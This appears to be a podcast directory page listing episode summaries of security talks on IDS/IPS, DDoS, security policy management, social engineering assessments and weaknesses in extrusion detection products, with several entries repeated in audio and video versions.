IDS / IPS theme continues with a tech segment from "the Other guy" proving he is not just another pretty face on the podcast. Then Dlink DCC bypass made simple by Paul. Of course stories, and we all LOVE stories. Episode 217 Show Notes Episode 217 part 2 Direct Audio Download Security Weekly YouTube Channel. Hosts: Paul Asadoorian,John Strand,Larry Pesce,Carlos Perez Audio Feeds:

Verizon Business – Connected Social Media

Distributed Denial of Service (DDoS) attacks are a growing threat for Internet-enabled businesses. Cindy Bellefeuille and Chris Hunsaker, security experts at Verizon Business, discuss DDoS attacks and alternatives to traditional security services such as firewalls and IDS/IPS solutions.

CERIAS Security Seminar Podcast
Ehab Al-Shaer, Ph.D., Toward Autonomic Security Policy Management

CERIAS Security Seminar Podcast

Play Episode Listen Later Aug 23, 2006 34:32


The assurance of network security is dependent not only on the protocols but also on polices that determine the functional behavior of network security devices. Network security devices such as Firewalls, IPSec gateways, IDS/IPS operate based on locally configured access control policies. However, the complexity of managing security polices, particularly in enterprise networks, poses many challenges for deploying effective security. For example, security policies are usually configured in isolation from each other, even though they are not necessarily independent as they interact with each other to form the global security policy. As a result of such ad-hoc management, policy inconsistencies and network vulnerability are created. In addition security policy might grow in size causing a significant performance overhead in security devices. A major performance gain can be achieved if policies can be dynamic optimized to adapt to traffic properties (called traffic-aware policy optimization). This talk will explain these challenges and present the recent research results in the area of automated verification, and optimization of network security polices. About the speaker: Ehab Al-Shaer is an Associate Professor and the Director of Multimedia Networking Research Lab (MNLAB)in the School of Computer Science, Telecommunications and Information System at DePaul University. He received his Ph.D. in CS from Old Dominion University, M.S. in CS from Northeastern University, and B.Sc. in CompEng from KFUPM in 1998, 1994, and 1990 respectively. His primary research areas are Network Security, Internet monitoring, fault management, and multimedia protocols. Prof. Al-Shaer has many refereed journal and conferences publications in his area. He is a Co-Editor of number of books in the area of multimedia management and Monitoring Internet Monitoring. Prof. Al-Shaer is currently the program co-chair for IM'07, the primer conference in network management. He was also the Conference Program Co-chair for MMNS'01, E2EMON'03-06. He also served as steering committee member, TPC member, guest speaker, panelist, tutorial presenter, for many IEEE/ACM conferences and industry seminars. Prof. Al-Shaer was a Guest Editor for many journals. He received a fellowship award from NASA Langley Research Center in 1997. His research is sponsored in part by NSF, Cisco, Intel, Sun Microsystems, Aramco and Aprisma.

CERIAS Security Seminar Podcast
Ehab Al-Shaer, Ph.D., "Toward Autonomic Security Policy Management"

CERIAS Security Seminar Podcast

Play Episode Listen Later Aug 23, 2006


The assurance of network security is dependent not only on the protocols but also on polices that determine the functional behavior of network security devices. Network security devices such as Firewalls, IPSec gateways, IDS/IPS operate based on locally configured access control policies. However, the complexity of managing security polices, particularly in enterprise networks, poses many challenges for deploying effective security. For example, security policies are usually configured in isolation from each other, even though they are not necessarily independent as they interact with each other to form the global security policy. As a result of such ad-hoc management, policy inconsistencies and network vulnerability are created. In addition security policy might grow in size causing a significant performance overhead in security devices. A major performance gain can be achieved if policies can be dynamic optimized to adapt to traffic properties (called traffic-aware policy optimization). This talk will explain these challenges and present the recent research results in the area of automated verification, and optimization of network security polices.

Black Hat Briefings, Las Vegas 2005 [Video] Presentations from the security conference
Joseph Klein: The Social Engineering Engagement Methodology - A Formal Testing process of the People and Process

Black Hat Briefings, Las Vegas 2005 [Video] Presentations from the security conference

Play Episode Listen Later Jun 4, 2006 40:54


The security of an organization is composed of technology, people and processes. In the last few years, many organizations have done a good job addressing technology but have focused very little on the people and processes. This presentation reviews the formal methodology for performing Social Engineering Engagements. The method is divided into four sections including the Pre-Engagement, Pre-Assessment, Assessment and Post-Assessment. The Pre-Engagement, is the sales process for performing the assessment. In this section, we will review the business justification and headlines of current attacks. Pre-Assessment if focused on identifying the scope of the project, limitation, targets and attack vectors. Also included are examples of what information must be gathers for use in the assessment and post assessment phase. The most interesting and tedious part is the actual assessment. In this section, we will discuss how to engage the target, utilize company information, how to achieve the goal and what to do when you are caught. Included in this section is also how and what to document about every contact. Post assessment is the analysis and reporting phase. In it, we will review documenting findings, and mapping them to recommendations. Joe Klein, CISSP is Senior Security Consultant at Honeywell and a member of the IPv6 Business Council. He performs network, application, web-application, wireless, source-code, host security reviews and security architecture design services for clients in the commercial and government space Prior to joining Honeywell, Joe worked as a consultant performing attack and penetration assessments for many significant companies in the IT arena. While consulting, Joe also taught "Hacking and Incident Handling", "IDS/IPS management" and "Managing Network Security" at a local college in Jacksonville Florida. He regularly speaking at conferences including Defcon, InfoSecWorld, PhreakNic and regional meetings including Infragard, ASIS and ISSA.>

Black Hat Briefings, Las Vegas 2005 [Audio] Presentations from the security conference
Joseph Klein: The Social Engineering Engagement Methodology - A Formal Testing process of the People and Process

Black Hat Briefings, Las Vegas 2005 [Audio] Presentations from the security conference

Play Episode Listen Later Jun 4, 2006 40:54


The security of an organization is composed of technology, people and processes. In the last few years, many organizations have done a good job addressing technology but have focused very little on the people and processes. This presentation reviews the formal methodology for performing Social Engineering Engagements. The method is divided into four sections including the Pre-Engagement, Pre-Assessment, Assessment and Post-Assessment. The Pre-Engagement, is the sales process for performing the assessment. In this section, we will review the business justification and headlines of current attacks. Pre-Assessment if focused on identifying the scope of the project, limitation, targets and attack vectors. Also included are examples of what information must be gathers for use in the assessment and post assessment phase. The most interesting and tedious part is the actual assessment. In this section, we will discuss how to engage the target, utilize company information, how to achieve the goal and what to do when you are caught. Included in this section is also how and what to document about every contact. Post assessment is the analysis and reporting phase. In it, we will review documenting findings, and mapping them to recommendations. Joe Klein, CISSP is Senior Security Consultant at Honeywell and a member of the IPv6 Business Council. He performs network, application, web-application, wireless, source-code, host security reviews and security architecture design services for clients in the commercial and government space Prior to joining Honeywell, Joe worked as a consultant performing attack and penetration assessments for many significant companies in the IT arena. While consulting, Joe also taught "Hacking and Incident Handling", "IDS/IPS management" and "Managing Network Security" at a local college in Jacksonville Florida. He regularly speaking at conferences including Defcon, InfoSecWorld, PhreakNic and regional meetings including Infragard, ASIS and ISSA.>

Black Hat Briefings, USA 2007 [Audio] Presentations from the security conference.
Eric Monti & Dan Moniz: Defeating Extrusion Detection

Black Hat Briefings, USA 2007 [Audio] Presentations from the security conference.

Play Episode Listen Later Jan 9, 2006 83:38


Todays headlines are rife with high profile information leakage cases affecting major corporations and government institutions. Most of the highest-profile leakage news has about been stolen laptops (VA, CPS), or large-scale external compromises of customer databases (TJX). On a less covered, but much more commonplace basis, sensitive financial data, company secrets, and customer information move in and out of networks and on and off of company systems all the time. Where it goes can be hard to pin down. How can a company prevent (let alone detect) Alice taking a snapshot of the customer database or financial projections and posting them on internet forums or even dumping them to a floppy disk? This, understandably, has a lot of people worried. In response, many organizations have begun looking for technologies to detect and prevent sensitive information from leaving their networks, servers, workstations, and even buildings. For some time a product space for ""Extrusion Detection"" products has existed. But now the space is exploding and as tends to happen, security problems abound. Some ""Extrusion Detections"" products rely on network gateway IPS/IDS approaches, whereas others work in a way more closely resembling host-based IDS/IPS. The main difference is that instead of detecting/preventing malicious information from entering a company's perimeter, they focus on keeping assets *inside*. We've been evaluating a number of products in this space and have run across a large number of vulnerabilities. They range from improper evidence handling, to inherent design issues, all the way to complete compromise of an enterprise, using the Extrusion Detection framework itself as the vehicle.

Black Hat Briefings, USA 2007 [Video] Presentations from the security conference.
Eric Monti & Dan Moniz: Defeating Extrusion Detection

Black Hat Briefings, USA 2007 [Video] Presentations from the security conference.

Play Episode Listen Later Jan 9, 2006 83:38


Todays headlines are rife with high profile information leakage cases affecting major corporations and government institutions. Most of the highest-profile leakage news has about been stolen laptops (VA, CPS), or large-scale external compromises of customer databases (TJX). On a less covered, but much more commonplace basis, sensitive financial data, company secrets, and customer information move in and out of networks and on and off of company systems all the time. Where it goes can be hard to pin down. How can a company prevent (let alone detect) Alice taking a snapshot of the customer database or financial projections and posting them on internet forums or even dumping them to a floppy disk? This, understandably, has a lot of people worried. In response, many organizations have begun looking for technologies to detect and prevent sensitive information from leaving their networks, servers, workstations, and even buildings. For some time a product space for ""Extrusion Detection"" products has existed. But now the space is exploding and as tends to happen, security problems abound. Some ""Extrusion Detections"" products rely on network gateway IPS/IDS approaches, whereas others work in a way more closely resembling host-based IDS/IPS. The main difference is that instead of detecting/preventing malicious information from entering a company's perimeter, they focus on keeping assets *inside*. We've been evaluating a number of products in this space and have run across a large number of vulnerabilities. They range from improper evidence handling, to inherent design issues, all the way to complete compromise of an enterprise, using the Extrusion Detection framework itself as the vehicle.